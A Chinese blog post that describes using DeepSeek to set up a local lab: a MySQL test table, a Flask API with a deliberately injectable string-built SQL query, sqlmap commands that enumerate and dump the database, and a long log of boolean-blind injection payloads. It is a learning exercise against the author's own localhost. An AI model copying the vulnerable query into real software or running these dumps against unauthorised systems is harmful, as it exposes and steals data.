网络安全-使用DeepSeek来获取sqlmap的攻击payload

文章目录


概述

今天来使用DeepSeek做安全测试,看看在有思路的情况下实现的快不快。

DeepSeek使用

我有一个思路,想要测试sqlmap工具如何dump数据库的:

连接mysql数据库,创建测试库、表,表至少包含整型、字符型列,插入示例数据

使用Python Flask编写一个API查询数据库并返回内容

使用sqlmap攻击该API

查看API日志

请优化我的思路,并给出相关的代码

创建示例数据库

sql 复制代码
-- 创建测试数据库
CREATE DATABASE sqlmap_test;

-- 创建包含多种数据类型的表
USE sqlmap_test;
CREATE TABLE users (
    id INT PRIMARY KEY AUTO_INCREMENT,
    username VARCHAR(50),
    email VARCHAR(100),
    age INT,
    created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
    profile TEXT,
    is_admin BOOLEAN DEFAULT FALSE
);

-- 插入测试数据
INSERT INTO users (username, email, age, profile, is_admin) VALUES
('admin', '[email protected]', 30, 'System Administrator', TRUE),
('user1', '[email protected]', 25, 'Regular user profile', FALSE),
('test_user', '[email protected]', 28, 'Another test user', FALSE);

创建API

python 复制代码
# app.py
import json
from flask import Flask, request, jsonify
import pymysql
from datetime import datetime
import logging
from logging.handlers import RotatingFileHandler
from setting import *

app = Flask(__name__)

# 配置数据库连接
db_config = {
    "host": DB_HOST,
    "user": DB_USER,
    "password": DB_PASSWORD,
    "db": DB_NAME,
    "port": DB_PORT,
    "charset": "utf8mb4",
    "cursorclass": pymysql.cursors.DictCursor
}


# 配置日志系统
def setup_logger():
    # 清除默认处理程序
    app.logger.handlers.clear()

    # 统一日志格式
    formatter = logging.Formatter(
        '[%(asctime)s] %(levelname)s in %(module)s: %(message)s'
    )

    # 访问日志配置
    access_handler = RotatingFileHandler(
        'access.log',
        maxBytes=1024 * 1024,
        backupCount=5,
        delay=True  # 延迟文件打开直到实际写入
    )
    access_handler.setFormatter(formatter)
    access_handler.setLevel(logging.INFO)
    app.logger.addHandler(access_handler)
    app.logger.setLevel(logging.INFO)

    # SQL日志配置(独立logger)
    sql_handler = RotatingFileHandler(
        'sql.log',
        maxBytes=1024 * 1024,
        backupCount=5,
        delay=True
    )
    sql_handler.setFormatter(formatter)
    sql_handler.setLevel(logging.INFO)

    sql_logger = logging.getLogger('sql')
    sql_logger.propagate = False  # 禁止传播到根logger
    sql_logger.setLevel(logging.INFO)
    sql_logger.addHandler(sql_handler)


# 确保在应用初始化后配置日志
setup_logger()


def get_db_connection():
    return pymysql.connect(**db_config)


@app.route('/users', methods=['GET'])
def get_users():
    search = request.args.get('search', '')
    # 强制立即刷新访问日志
    app.logger.info(f"Access: {request.method} {request.path} - Params: {dict(request.args)}")
    app.logger.handlers[0].flush()
    conn = get_db_connection()
    try:

        with conn.cursor() as cursor:
            # 存在漏洞的查询
            query = f"SELECT * FROM users WHERE username = '{search}'"

            # 记录SQL并强制刷新
            sql_logger = logging.getLogger('sql')
            sql_logger.info(f"EXECUTE SQL: {query}")
            sql_logger.handlers[0].flush()

            cursor.execute(query)
            results = cursor.fetchall()

        # 转换datetime为字符串
        for row in results:
            if 'created_at' in row and isinstance(row['created_at'], datetime):
                row['created_at'] = row['created_at'].isoformat()
        app.logger.info(json.dumps(results), exc_info=True)
        return jsonify(results)
    except pymysql.Error as e:
        # 记录完整错误信息
        error_msg = f"Database error ({e.args[0]}): {e.args[1]}"
        app.logger.error(error_msg, exc_info=True)
        app.logger.handlers[0].flush()
        return jsonify({"error": "Database error"})
    except Exception as e:
        app.logger.error(f"Unexpected error: {str(e)}", exc_info=True)
        app.logger.handlers[0].flush()
        return jsonify({"error": "Server error"})
    finally:
        if 'conn' in locals():
            conn.close()


if __name__ == '__main__':
    # 禁用重载器以避免重复日志
    app.run(host='0.0.0.0', port=5000, debug=False, use_reloader=False)

运行后访问

bash 复制代码
http://127.0.0.1:5000/users?search=test_user

结果如下:

测试sqlmap

bash 复制代码
python sqlmap.py -u "http://localhost:5000/users?search=test_user" --technique=B --threads 8 -dbs --batch
python sqlmap.py -u "http://localhost:5000/users?search=test_user" --technique=B --threads 8 -D sqlmap_test --tables --batch
python sqlmap.py -u "http://localhost:5000/users?search=test_user" --technique=B --threads 8 -D sqlmap_test -T users --columns --batch
python sqlmap.py -u "http://localhost:5000/users?search=test_user" --technique=B --threads 8 -D sqlmap_test -T users -C id,username,is_admin -dump --dump-format csv --batch




整体来说,实现的还挺快的,只有API实现时微调了一下日志和响应码。

ps:话说我只是测试下DeepSeek,sqlmap咋还出错了,两个test_user是什么鬼...

部分日志

bash 复制代码
[2025-03-01 21:55:51,918] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>51 AND 'FFDM'='FFDM'
[2025-03-01 21:55:54,058] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>54 AND 'FFDM'='FFDM'
[2025-03-01 21:55:54,139] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>52 AND 'FFDM'='FFDM'
[2025-03-01 21:55:56,258] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>53 AND 'FFDM'='FFDM'
[2025-03-01 21:55:56,343] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>51 AND 'FFDM'='FFDM'
[2025-03-01 21:55:59,600] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>48 AND 'FFDM'='FFDM'
[2025-03-01 21:55:59,682] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(CHAR_LENGTH(username) AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>9 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,814] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>64 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,819] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>64 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,828] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>64 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,828] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>64 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,829] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>64 AND 'FFDM'='FFDM'
[2025-03-01 21:56:01,898] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>96 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,070] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>96 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,070] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>96 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,074] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>112 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,074] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>96 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,074] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>96 AND 'FFDM'='FFDM'
[2025-03-01 21:56:04,167] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>112 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,190] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>112 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,190] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>104 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,190] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>112 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,197] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>112 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,266] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>104 AND 'FFDM'='FFDM'
[2025-03-01 21:56:06,284] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>104 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,317] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>104 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,317] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>104 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,318] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>100 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,372] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>100 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,406] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>108 AND 'FFDM'='FFDM'
[2025-03-01 21:56:08,408] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>108 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,575] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>98 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,575] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>106 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,575] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>98 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,575] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>110 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,576] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>108 AND 'FFDM'='FFDM'
[2025-03-01 21:56:10,670] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),1,1))>97 AND 'FFDM'='FFDM'
[2025-03-01 21:56:12,724] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),5,1))>109 AND 'FFDM'='FFDM'
[2025-03-01 21:56:12,738] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),2,1))>99 AND 'FFDM'='FFDM'
[2025-03-01 21:56:12,739] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>110 AND 'FFDM'='FFDM'
[2025-03-01 21:56:12,740] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),4,1))>105 AND 'FFDM'='FFDM'
[2025-03-01 21:56:12,838] INFO in main: EXECUTE SQL: SELECT * FROM users WHERE username = 'test_user' AND ORD(MID((SELECT IFNULL(CAST(username AS NCHAR),0x20) FROM sqlmap_test.users ORDER BY is_admin LIMIT 2,1),3,1))>109 AND 'FFDM'='FFDM'

参考

腾讯元宝
sqlmap

相关推荐
币之互联万物1 天前
AQUA爱克泳池设备入驻济南校园,以品质筑牢游泳教育安全防线
安全
Linux运维老纪1 天前
运维之 Centos7 防火墙(CentOS 7 Firewall for Operations and Maintenance)
linux·安全·centos·云计算·运维开发·火绒
360安全应急响应中心1 天前
基于 RAG 提升大模型安全运营效率
安全·aigc
EasyNVR1 天前
国标GB28181视频监控平台EasyCVR保驾护航休闲娱乐“九小场所”安全运营
网络·安全
Ai野生菌1 天前
工具介绍 | SafeLLMDeploy教程来了 保护本地LLM安全部署
网络·人工智能·安全·大模型·llm
DevSecOps选型指南1 天前
浅谈软件成分分析 (SCA) 在企业开发安全建设中的落地思路
安全·开源治理·软件成分分析·sca·软件供应链安全工具
cjchsh1 天前
春秋云境(CVE-2023-23752)
安全
【云轩】1 天前
《混沌钟的RISC-V指令集重构》
网络·安全
EasyGBS1 天前
视频设备轨迹回放平台EasyCVR打造视频智能融合新平台,驱动智慧机场迈向数字新时代
网络·人工智能·安全·音视频